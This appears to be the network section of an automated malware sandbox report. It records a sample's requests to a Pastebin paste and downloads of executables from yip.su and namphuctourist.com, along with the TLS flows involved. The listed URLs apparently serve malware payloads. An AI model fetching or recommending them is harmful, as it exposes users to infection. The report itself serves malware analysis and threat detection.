Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
namphuctourist.com | 103.28.36.182 | |
raw.githubusercontent.com | 185.199.110.133 | |
pastebin.com | 172.67.19.24 | |
yip.su | 172.67.169.89 |
GET
200
https://pastebin.com/raw/E0rY26ni
REQUEST
RESPONSE
BODY
GET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2024 22:39:48 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Mon, 22 Jul 2024 12:10:21 GMT
Server: cloudflare
CF-RAY: 8a76edc5484829d2-FUK
GET
200
https://yip.su/RNWPd.exe
REQUEST
RESPONSE
BODY
GET /RNWPd.exe HTTP/1.1
Host: yip.su
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2024 22:39:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
memory: 0.36197662353515625
expires: Mon, 22 Jul 2024 22:39:49 +0000
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
Cache-Control: max-age=14400
CF-Cache-Status: EXPIRED
Last-Modified: Mon, 22 Jul 2024 22:36:32 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8JNmkCQWbg3K9AjgPIcBv4ssWENAZb0f6hnGh2DbDRRfvqM2fC5r9aFsL%2FrhPPyNLw11KVlP1t%2BlgmlXVqQEqb37RPVgAFxez3IpAAIXNoLbKDfdYoPxJVs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8a76edc9cf0a0ccf-LAX
alt-svc: h3=":443"; ma=86400
GET
200
http://namphuctourist.com/tmp/1.exe
REQUEST
RESPONSE
BODY
GET /tmp/1.exe HTTP/1.1
Host: namphuctourist.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2024 22:39:48 GMT
Server: Apache
Last-Modified: Mon, 22 Jul 2024 21:45:02 GMT
Accept-Ranges: bytes
Content-Length: 155648
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.101:49165 104.20.3.235:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=pastebin.com | 82:49:c5:04:9a:bd:a9:c1:ab:4d:ff:95:b9:94:74:cc:40:bc:09:7f |
TLS 1.2 192.168.56.101:49167 185.199.111.133:443 |
C=US, O=DigiCert Inc, CN=DigiCert Global G2 TLS RSA SHA256 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io | 97:d8:c5:70:0f:12:24:6c:88:bc:fa:06:7e:8c:a7:4d:a8:62:67:28 |
TLS 1.2 192.168.56.101:49166 172.67.169.89:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=yip.su | cd:f2:dd:c5:ee:57:d1:5f:01:8c:10:00:ac:b5:85:96:0e:f7:0a:32 |
Snort Alerts
No Snort Alerts